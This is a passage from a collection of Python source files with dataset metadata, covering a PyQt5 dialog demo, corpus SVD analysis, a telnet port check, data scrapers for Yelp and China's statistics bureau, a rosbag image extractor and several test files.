"PyQt5.QtWidgets.QApplication", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "147855923", "text": "# coding:utf-8\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\n\nfrom dialog import Dialog\n\n\nclass Window(QWidget):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.resize(1000, 500)\n self.btn = QPushButton('点我', parent=self)\n self.btn.move(425, 225)\n self.btn.clicked.connect(self.showDialog)\n with open('resource/demo.qss', encoding='utf-8') as f:\n self.setStyleSheet(f.read())\n\n def showDialog(self):\n content = '如果将\"音乐\"文件夹从音乐中移除,则该文件夹不会再出现在音乐中,但不会被删除。'\n w = Dialog('删除此文件夹吗?', content, self)\n w.exec()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = Window()\n w.show()\n sys.exit(app.exec_())\n", "sub_path": "widgets/dialog/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 848, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 13, "usage_type": "call"}, {"api_name": "dialog.Dialog", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "15455134", "text": "\"\"\"\nResearch questions:\n1. Are singular values higher for first or second half of input?\n2. Are those dimensions with higher singular values NOUN-encoding dimensions?\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom scipy.sparse import linalg as slinalg\nfrom sklearn.preprocessing import normalize\nimport attr\nimport numpy as np\n\nfrom preppy import PartitionedPrep as TrainPrep\n\nfrom wordplay import config\nfrom wordplay.params import PrepParams\nfrom wordplay.docs import load_docs\nfrom wordplay.representation import make_context_by_term_matrix\nfrom wordplay.svd import decode_singular_dimensions\nfrom wordplay.pos import load_pos_words\nfrom wordplay import config\n\n# /////////////////////////////////////////////////////////////////\n\nCORPUS_NAME = 'childes-20180319'\n\ndocs = load_docs(CORPUS_NAME)\n\nparams = PrepParams(num_types=None)\nprep = TrainPrep(docs, **attr.asdict(params))\n\n# /////////////////////////////////////////////////////////////////\n\nCONTEXT_SIZE = 2\nNUM_DIMS = 32\nNORMALIZE = False # this makes all the difference - this means that the scales of variables are different and matter\n\n\nNOM_ALPHA = 0.01 # TODO test\n\nOFFSET = prep.midpoint\nLABELS = [f'first {OFFSET:,} tokens', f'last {OFFSET:,} tokens']\n\n# ///////////////////////////////////////////////////////////////////// categories\n\n# make syntactic categories for probing\ncat2words = {}\nfor cat in ['nouns', 'verbs']:\n category_words = load_pos_words(f'{CORPUS_NAME}-{cat}')\n cat2words[cat] = category_words\n print(f'Loaded {len(category_words)} words in category {cat}')\n assert len(category_words) > 0\n\n# /////////////////////////////////////////////////////////////////////////// SVD\n\n# make term_by_window_co_occurrence_mats\nstart1, end1 = 0, prep.midpoint\nstart2, end2 = prep.midpoint, prep.store.num_tokens\ntw_mat1, xws1, yws1 = make_context_by_term_matrix(\n prep.store.tokens, start=start1, end=end1, context_size=CONTEXT_SIZE)\ntw_mat2, xws2, yws2 = make_context_by_term_matrix(\n prep.store.tokens, start=start2, end=end2, context_size=CONTEXT_SIZE)\n\n\n# collect singular values\nlabel2cat2dim_ids = {}\nlabel2s = {}\nfor mat, label, x_words in zip([tw_mat1.T.asfptype(), tw_mat2.T.asfptype()],\n LABELS,\n [xws1, xws2]):\n\n if NORMALIZE:\n mat = normalize(mat, axis=1, norm='l2', copy=False)\n\n # SVD\n u, s, _ = slinalg.svds(mat, k=NUM_DIMS, return_singular_vectors=True)\n print('sum of singular values={:,}'.format(s.sum()))\n print('var of singular values={:,}'.format(s.var()))\n\n # collect singular values\n label2s[label] = s\n\n # let noun and verbs compete for dimensions to be sure that a dimension encodes nouns\n cat2dim_ids = decode_singular_dimensions(u, cat2words, x_words,\n num_dims=NUM_DIMS,\n nominal_alpha=NOM_ALPHA,\n plot_loadings=False)\n\n label2cat2dim_ids[label] = cat2dim_ids\n\n# get noun dims to label figure\nnoun_dims1 = label2cat2dim_ids[LABELS[0]]['nouns']\nnoun_dims2 = label2cat2dim_ids[LABELS[1]]['nouns']\ns1 = label2s[LABELS[0]]\ns2 = label2s[LABELS[1]]\ns1_noun_dims = [s1[i] if not np.isnan(i) else np.nan for i in noun_dims1]\ns2_noun_dims = [s2[i] if not np.isnan(i) else np.nan for i in noun_dims2]\n\n# figure\nfig, ax = plt.subplots(figsize=config.Fig.fig_size, dpi=config.Fig.dpi)\nplt.title(f'SVD of AO-CHILDES partitions\\nwindow size={CONTEXT_SIZE}', fontsize=config.Fig.ax_fontsize)\nax.set_ylabel('Singular value', fontsize=config.Fig.ax_fontsize)\nax.set_xlabel('Singular Dimension', fontsize=config.Fig.ax_fontsize)\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.tick_params(axis='both', which='both', top=False, right=False)\n# plot\nax.plot(s1[::-1], label=LABELS[0], linewidth=2, color='C0')\nax.plot(s2[::-1], label=LABELS[1], linewidth=2, color='C1')\n# label noun-dims\nx = np.arange(NUM_DIMS)\n\nax.scatter(x, s1_noun_dims[::-1], label='NOUN dimension', color='C0', zorder=3)\nax.scatter(x, s2_noun_dims[::-1], label='NOUN dimension', color='C1', zorder=3)\nax.legend(loc='upper right', frameon=False, fontsize=config.Fig.ax_fontsize)\nplt.tight_layout()\nplt.show()", "sub_path": "scripts/svd/singular_values.py", "file_name": "singular_values.py", "file_ext": "py", "file_size_in_byte": 4233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "wordplay.docs.load_docs", "line_number": 27, "usage_type": "call"}, {"api_name": "wordplay.params.PrepParams", "line_number": 29, "usage_type": "call"}, {"api_name": "preppy.PartitionedPrep", "line_number": 30, "usage_type": "call"}, {"api_name": "attr.asdict", "line_number": 30, "usage_type": "call"}, {"api_name": "wordplay.pos.load_pos_words", "line_number": 49, "usage_type": "call"}, {"api_name": "wordplay.representation.make_context_by_term_matrix", "line_number": 59, "usage_type": "call"}, {"api_name": "wordplay.representation.make_context_by_term_matrix", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 73, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.svds", "line_number": 76, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg", "line_number": 76, "usage_type": "name"}, {"api_name": "wordplay.svd.decode_singular_dimensions", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 97, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "wordplay.config.Fig", "line_number": 100, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "wordplay.config.Fig", "line_number": 101, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 101, "usage_type": "name"}, {"api_name": "wordplay.config.Fig", "line_number": 102, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 102, "usage_type": "name"}, {"api_name": "wordplay.config.Fig", "line_number": 103, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 103, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 111, "usage_type": "call"}, {"api_name": "wordplay.config.Fig", "line_number": 115, "usage_type": "attribute"}, {"api_name": "wordplay.config", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "174629713", "text": "import telnetlib\nimport sys\nimport os\n\nfrom mstore.common import cfg\n\ncore_opts = [\n cfg.StrOpt('port', default='8989',\n help=('The mstore server listen port')),\n]\n\nCONF = cfg.CONF\nCONF.register_opts(core_opts)\n\n\ndef telnet(host):\n status = ''\n msg = ''\n try:\n tn = telnetlib.Telnet(host, port=CONF.port, timeout=3)\n except Exception:\n status = 'inactive'\n msg = 'connected timeout'\n return status,msg\n \n tn.close()\n status = 'active'\n msg = 'connected ok'\n return status,msg\n", "sub_path": "mstore/common/telnet.py", "file_name": "telnet.py", "file_ext": "py", "file_size_in_byte": 549, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "mstore.common.cfg.StrOpt", "line_number": 8, "usage_type": "call"}, {"api_name": "mstore.common.cfg", "line_number": 8, "usage_type": "name"}, {"api_name": "mstore.common.cfg.CONF", "line_number": 12, "usage_type": "attribute"}, {"api_name": "mstore.common.cfg", "line_number": 12, "usage_type": "name"}, {"api_name": "telnetlib.Telnet", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "287482537", "text": "import pytest\n\nimport os\nimport pandas as pd\nfrom dataland.dataset import IncrementalDataset\n\n@pytest.fixture\ndef dataset():\n return pd.DataFrame({'col_a': [1, 2, 3], 'col_b': [4, 5, 6]})\n\nclass TestIncrementalDataset(object):\n def test_creates_new_local_dataset(self):\n incremental = IncrementalDataset('tmp/sample_dataset')\n metadata = open('tmp/sample_dataset/.metadata')\n\n assert metadata.read() == '{\"first_drop\": null, \"drop_count\": 0, \"last_drop\": null, columns: []}'\n\n @pytest.mark.freeze_time('2018-04-20 16:20:00.012')\n def test_store_create_new_data_drop(self, dataset):\n incremental = IncrementalDataset('tmp/sample_dataset/')\n\n assert not os.path.isfile('tmp/sample_dataset/2018-04-20-1620.csv')\n incremental.store(dataset)\n\n assert os.path.isfile('tmp/sample_dataset/2018-04-20-1620.csv')\n", "sub_path": "tests/dataland/test_dataset.py", "file_name": "test_dataset.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.DataFrame", "line_number": 9, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 7, "usage_type": "attribute"}, {"api_name": "dataland.dataset.IncrementalDataset", "line_number": 13, "usage_type": "call"}, {"api_name": "dataland.dataset.IncrementalDataset", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pytest.mark.freeze_time", "line_number": 18, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 18, "usage_type": "attribute"}]} +{"seq_id": "286646286", "text": "import functools\nimport operator\n\n\ndef tree_feature_importance(dataset, label_name, tree):\n features_dict = {}\n root = tree.get_root()\n this_level = [(root, dataset)]\n while this_level:\n next_level = list()\n for node, data in this_level:\n if node.is_terminal():\n continue\n # Save for the next level\n RL_data = data[data.iloc[:, node.j] <= node.s]\n RR_data = data[data.iloc[:, node.j] > node.s]\n next_level.append((node.left_descendant, RL_data))\n next_level.append((node.right_descendant, RR_data))\n # calculate needed constatns\n c_bef = node[label_name].mean()\n c_L = RL_data[label_name].mean()\n c_R = RR_data[label_name].mean()\n if node.j not in features_dict.keys():\n features_dict[node.j] = 0\n\n features_dict[node.j] += \\\n functools.reduce(operator.add, [(row[label_name] - c_bef) ** 2 for _, row in data.iterrows()]) + \\\n functools.reduce(operator.add, [(row[label_name] - c_L) ** 2 for _, row in RL_data.iterrows()]) + \\\n functools.reduce(operator.add, [(row[label_name] - c_R) ** 2 for _, row in RR_data.iterrows()])\n\n this_level = next_level\n return features_dict\n\n\ndef ensemble_feature_importance(dataset, label_name, tree_ensemble):\n ensemble_features_dict = {}\n for tree in tree_ensemble.trees:\n tree_features_dict = tree_feature_importance(dataset, label_name, tree)\n for feature_id, score in tree_features_dict.items():\n if feature_id not in ensemble_features_dict.keys():\n ensemble_features_dict[feature_id] = 0\n ensemble_features_dict[feature_id] += score\n ensemble_features_dict = sorted(ensemble_features_dict.items(), key=operator.itemgetter(1), reverse=True)\n most_imp_val = ensemble_features_dict.values()[0]\n ensemble_features_dict = {k: float(v / most_imp_val) for k, v in ensemble_features_dict.items()}\n return ensemble_features_dict", "sub_path": "feature_selection.py", "file_name": "feature_selection.py", "file_ext": "py", "file_size_in_byte": 2073, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "functools.reduce", "line_number": 27, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 27, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 28, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 28, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 29, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 29, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "117125525", "text": "from fire_eye.fire_eye import FireEye\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nif __name__ == '__main__':\n\t# create an instance of a FireEye object\n\teye = FireEye()\n\n\t# scrape some new images\n\teye.scrape_more_data(num_images=2,\n\t\t\t\t\t\t pos_queries=['Forest Fire', 'wildfire'],\n\t\t\t\t\t\t neg_queries=['Forest', 'autumn forest'])\n\t\n\t# load any previously scraped images into the preprocessed dataset\n\teye.load_scraped_data(pos_queries=['Forest Fire', 'wildfire'],\n\t\t\t\t\t\t neg_queries=['Forest', 'autumn forest'])\n\t# load kaggle dataset images into the preprocessed dataset\n\teye.load_kaggle_data()\n\t# print the dataset breakdown of train/validation/test\n\tprint(eye.get_dataset_sizes())\n\n\t# train the model for a specified number of epochs\n\tfig0 = eye.train_model(num_epochs=2)\n\t\n\t# evaluate the model and produce relevant figures\n\tfig1, fig2 = eye.evaluate_model()\n\n\t# optionally save the model\n\teye.save_model('demo_model')\n\t\n\t# display all figures\n\tplt.show()\n\n\n\t'''\n\tThe following is an example script that might be run after training\n\tto further evaluate the trained model. In general, scripts should first\n\tload data, then either load or train a model, and finally evaluate the\n\tperformance of the model.\n\n\tthe preprocessed directory should be cleaned before starting a new dataset.\n\tRefer to the Makefile and README.md\n\n\t# after training (and cleaning preprocessed data), consider loading new data\n\teye.load_scraped_data(pos_queries=['Forest Fire'],\n \t\t\t\t\t\t neg_queries=['autumn forest'])\n\t# load the trained model as well\n\teye.load_model('full_dataset_model')\n\t# evaluate the model on the new dataset\n\tfig1, fig2 = eye.evaluate_model(title_prefix='Kaggle Datasets ')\n\tplt.show()\n\t'''\n\n", "sub_path": "fire_eye/__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 1711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "fire_eye.fire_eye.FireEye", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "245313206", "text": "# -*- coding: utf-8 -*-\n\nimport json\nimport os\nimport datetime\nimport urllib2\nimport time\n\nfrom settings import download_dir, configurelog, testlogger\nfrom lib.nonsdmx import NonSdmx\n\nendpoint = 'http://data.stats.gov.cn/english/easyquery.htm'\nTREE_URL = endpoint + '?id=%(id)s&dbcode=%(dbcode)s&wdcode=%(wdcode)s&m=getTree'\n\nABORT_ON_UNCHANGED = True\nlogger = testlogger()\n\n\ndef is_parent(nodes):\n \"\"\"\n Parse pages for item tha have no child recursively, if find that\n item pass it to scrape data function\n \"\"\"\n for node in nodes:\n if node['isParent']:\n time.sleep(1)\n new_page = urllib2.urlopen(TREE_URL % node).read()\n new_page = json.loads(new_page)\n is_parent(new_page)\n else:\n parse_table(node)\n\n\ndef parse_table(terminal_node):\n tgt_dir = os.path.join(download_dir, 'china_nbs')\n if not os.path.exists(tgt_dir):\n os.makedirs(tgt_dir)\n\n lastupdate = datetime.datetime.today().date()\n item_id = terminal_node['id']\n item_name = terminal_node['name']\n url = endpoint + ('?m=QueryData&dbcode=%(dbcode)s&'\n 'rowcode=%(wdcode)s&colcode=sj&wds=[]&'\n 'dfwds=[{\"wdcode\":\"zb\",\"valuecode\":\"%(id)s\"},'\n '{\"wdcode\":\"sj\",\"valuecode\":\"LAST200\"}]') % terminal_node\n in_in_page = urllib2.urlopen(url).read()\n json_response = json.loads(in_in_page.decode('utf8'))\n data, returncode = json_response['returndata'], json_response['returncode']\n assert(returncode == 200)\n\n nsi = NonSdmx(**{'db_name': 'NBS',\n 'dataset': 'NBS_'+ item_id,\n 'logger': logger,\n 'lastupdate': lastupdate, # need to change\n 'source': 'National Bureau of Statistics, China',\n 'description': terminal_node['name'],\n 'access_url': endpoint,\n 'ABORT_ON_UNCHANGED': ABORT_ON_UNCHANGED})\n\n if not nsi.create_conn():\n return nsi.unchanged()\n\n for v in data['returndata']['wdnodes'][0]['nodes']:\n serial = v['code']\n descrip = v['memo']\n units = v['unit']\n scale = 0\n sadj = None\n addinfo = {}\n dates = []\n all_values = []\n\n for val in data['returndata']['datanodes']:\n if serial == val['wds'][0]['valuecode']:\n date = (val['wds'][1]['valuecode'])\n date = datetime.datetime.strptime(date, '%Y%m')\n\n dates.append(date)\n all_values.append(val['data']['data'])\n\n values = {'serial': serial,\n 'freq': freq,\n 'iso2': 'CN',\n 'descrip': descrip,\n 'seasonaladj': sadj,\n 'scale': scale,\n 'units': units,\n 'addinfo': addinfo,\n 'lastupdate': datetime.datetime.today().date(),\n 'values': {'dates': dates[::-1],\n 'data': all_values[::-1]}\n }\n nsi.append_values(values)\n nsi.process_and_close()\n\n\n@configurelog(__file__)\ndef domain(logger):\n \"\"\"\n get dict item as input form request for non parent item, create\n path like in initial tree and save json file there\n \"\"\"\n parse_page = urllib2.urlopen(endpoint +\n '?id=&dbcode=hgyd&wdcode=zb&m=getTree').read()\n start_nodes = json.loads(parse_page)\n is_parent(start_nodes)\n\n\nif __name__ == \"__main__\":\n if 0:\n domain()\n", "sub_path": "ch_stat_example.py", "file_name": "ch_stat_example.py", "file_ext": "py", "file_size_in_byte": 3523, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "settings.testlogger", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 27, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "settings.download_dir", "line_number": 35, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "urllib2.urlopen", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}, {"api_name": "lib.nonsdmx.NonSdmx", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 76, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 89, "usage_type": "attribute"}, {"api_name": "urllib2.urlopen", "line_number": 103, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 105, "usage_type": "call"}, {"api_name": "settings.configurelog", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "569248445", "text": "####################################################################\n # Name: messages.py\n # Initializes the parts of an email message to be used by other\n # classes.\n####################################################################\n__author__ = 'kkozee'\n\nimport sys\n\nsys.path.append('/Users/kkozee/PycharmProjects/cs362_W15_G9/')\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom src.models.base import Base\n\nclass Messages(Base):\n\n def __init__(self):\n self.fullMsg = None\n self.inMsg = None\n self.sendAddr = None\n self.destAddr = None\n self.subject = None\n self.body = None\n self.bodyParts = None\n self.subjectParts = None\n self.mimeText = None\n self.calendarRequest = None\n self.msg = MIMEMultipart('alternative')\n self.pt1 = MIMEText(self.mimeText, 'plain')\n self.pt2 = MIMEText(self.calendarRequest, 'calendar')", "sub_path": "cs419_Term Project/src/models/messages.py", "file_name": "messages.py", "file_ext": "py", "file_size_in_byte": 963, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "src.models.base.Base", "line_number": 16, "usage_type": "name"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 29, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 30, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "201229773", "text": "#!/usr/bin/python\nimport rosbag\n\nimport sys\nimport argparse\n\nimport os\nimport shutil\n\nimport progressbar\n\nimport numpy as np\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\n\nfrom sensor_msgs.msg import Image\n\n\ndef zip_images(dir_name, output_filename):\n shutil.make_archive(output_filename, 'zip', dir_name)\n\n\ndef decompress_images(bag_filename, destination_folder, num_images_per_zip):\n\n bridge = CvBridge()\n bag = rosbag.Bag(bag_filename)\n\n if os.path.exists(destination_folder):\n shutil.rmtree(destination_folder)\n os.mkdir(destination_folder)\n\n start_time = bag.get_start_time()\n end_time = bag.get_end_time()\n run_time = end_time - start_time\n\n print(\"Bag is %.2f seconds\" % run_time)\n\n type_topic_info = bag.get_type_and_topic_info()\n topics = type_topic_info.topics\n print(\"Bag contains topics: \")\n\n for topic in topics.keys():\n print(\"\\t%s %s %d\" % (topic, topics[topic][0], topics[topic][1]))\n\n toolbar_width = 70\n bar = progressbar.ProgressBar(maxval=toolbar_width,\n widgets=[progressbar.Bar('#', '[', ']'), ' ',\n progressbar.Percentage()])\n bar.start()\n\n num_images = 0\n subdir_names = []\n subdir_num = -1\n for topic, msg, t in bag.read_messages():\n bar.update((t.to_sec() - start_time) / run_time * toolbar_width)\n\n if msg._type == Image._type:\n\n if num_images % num_images_per_zip == 0:\n # if -1, only do this the first time\n if (num_images_per_zip != -1) or (len(subdir_names) == 0):\n subdir_num += 1\n subdir_names.append(\n bag_filename.split(\".\")[0] + \"_%s\" % subdir_num)\n os.mkdir(destination_folder + \"/\" + subdir_names[subdir_num])\n try:\n\n img = bridge.imgmsg_to_cv2(msg, desired_encoding=\"bgr8\")\n image_name = \"%s_%s.jpg\" % (topic.split(\"/\")[-1], str(t))\n destination_name = destination_folder\n destination_name += \"/%s/%s\" % (subdir_names[subdir_num],\n image_name)\n\n cv2.imwrite(destination_name, img)\n num_images += 1\n\n except CvBridgeError as e:\n print(e)\n\n bag.close()\n\n print(\"\") # move down a line from the progress bar\n print(\"Extracted %s images. Creating zips ...\" % num_images)\n for subdir_name in subdir_names:\n zip_images(destination_folder + \"/\" + subdir_name,\n \"zipped_images/%s_unlabeled\" % subdir_name)\n print(\"Done!\")\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--bag', default=None)\n parser.add_argument('--max_imgs', default=1000) # use -1 for all in one\n parser.add_argument('--output_folder', default=\"images\")\n\n args = parser.parse_args(sys.argv[1:])\n\n if args.bag is None:\n print(\"Bag file is required!\")\n return\n\n decompress_images(args.bag, args.output_folder, int(args.max_imgs))\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "data_gen/bag_to_images.py", "file_name": "bag_to_images.py", "file_ext": "py", "file_size_in_byte": 3136, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "shutil.make_archive", "line_number": 20, "usage_type": "call"}, {"api_name": "cv_bridge.CvBridge", "line_number": 25, "usage_type": "call"}, {"api_name": "rosbag.Bag", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 29, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 30, "usage_type": "call"}, {"api_name": "progressbar.ProgressBar", "line_number": 46, "usage_type": "call"}, {"api_name": "progressbar.Bar", "line_number": 47, "usage_type": "call"}, {"api_name": "progressbar.Percentage", "line_number": 48, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image._type", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 74, "usage_type": "call"}, {"api_name": "cv_bridge.CvBridgeError", "line_number": 77, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 91, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 96, "usage_type": "attribute"}]} +{"seq_id": "477228412", "text": "from bs4 import BeautifulSoup\nimport sys\nimport requests\n\n\n# getting command line arguments\nargs = sys.argv\n\n# assigning command line arguments to variables for search\ntry:\n business_type = args[1]\n location = args[2]\n sql_file = (business_type + \"_\" + location + \".sql\").replace(\"+\", \"_\")\n\n # creating url with command line arguments\n url = \"https://www.yelp.com/search?find_desc=\" + business_type + \"&find_loc=\" + location\n\n source = requests.get(url).text\n soup = BeautifulSoup(source, 'lxml')\n i = 1\n\n with open(sql_file, 'w') as file:\n table_name = business_type + '_' + location\n file.write('DROP DATABASE IF EXISTS yelp\\n')\n file.write('CREATE DATABASE yelp\\n')\n file.write('CREATE TABLE ' + table_name.replace(\"+\", \"_\") + '(id integer, business_name text, category text, location text, primary key (id));\\n')\n for li in soup.find('ul'):\n try:\n result_num = i\n result_name = li.h4.a.text\n result_category = li.find('a', 'lemon--a__09f24__IEZFH link__09f24__1kwXV link-color--inherit__09f24__3PYlA link-size--default__09f24__3xWLF').text\n file.write(\"INSERT INTO \" + table_name.replace(\"+\", \"_\") + \" VALUES ('\" + str(result_num) + \"','\" + result_name + \"','\" + result_category + \"','\" + location.replace(\"+\", \", \") + \"');\\n\")\n i += 1\n except:\n pass\nexcept:\n print('not the right number of args, please enter 2 command line args: a search and a location')\n\n\n\n", "sub_path": "yelp_scraping.py", "file_name": "yelp_scraping.py", "file_ext": "py", "file_size_in_byte": 1536, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "103634723", "text": "from delta.model import *\nfrom delta.util import create_cgra\nimport pytest\nimport lassen.asm as asm\nfrom archipelago import pnr\nfrom karst.core import MemoryInstruction, MemoryMode\n\n\n@pytest.fixture\ndef interconnect_route():\n chip_size = 2\n\n interconnect = create_cgra(chip_size, True, cores_input=None)\n\n netlist = {\"e0\": [(\"I0\", \"io2f_16\"), (\"p0\", \"data0\")],\n \"e1\": [(\"I1\", \"io2f_16\"), (\"p0\", \"data1\")],\n \"e2\": [(\"p0\", \"out\"), (\"m0\", \"addr\")],\n \"e3\": [(\"m0\", \"data_out\"), (\"I2\", \"f2io_16\")],\n \"e4\": [(\"i0\", \"io2f_1\"), (\"m0\", \"ren\")]}\n bus = {\"e0\": 16, \"e1\": 16, \"e2\": 16, \"e3\": 16, \"e4\": 1}\n\n placement, route = pnr(interconnect, (netlist, bus), cwd=\"temp\")\n\n return interconnect, placement, route\n\n\ndef test_add(interconnect_route):\n interconnect, placement, route_path = interconnect_route\n instruction = asm.add()\n\n compiler = InterconnectModelCompiler(interconnect)\n compiler.configure_route(route_path)\n x, y = placement[\"p0\"]\n compiler.set_core_instr(x, y, instruction)\n # configure the memory\n data_entries = [(i, i + 42) for i in range(100)]\n mem_instr = MemoryInstruction(MemoryMode.SRAM,\n data_entries=data_entries)\n x, y = placement[\"m0\"]\n compiler.set_core_instr(x, y, mem_instr)\n\n model = compiler.compile()\n\n # poke values\n path = route_path[\"e0\"][0]\n input_1 = path[0]\n path = route_path[\"e1\"][0]\n input_2 = path[0]\n path = route_path[\"e4\"][0]\n input_3 = path[0]\n path = route_path[\"e3\"][0]\n end = path[-1]\n\n # set ren to high all the time\n model.set_value(input_3, 1)\n\n for idx, value in enumerate(range(10)):\n model.set_value(input_1, value)\n model.set_value(input_2, value)\n model.eval()\n if idx > 0:\n assert model.get_value(end) == value + value + 42 - 2\n", "sub_path": 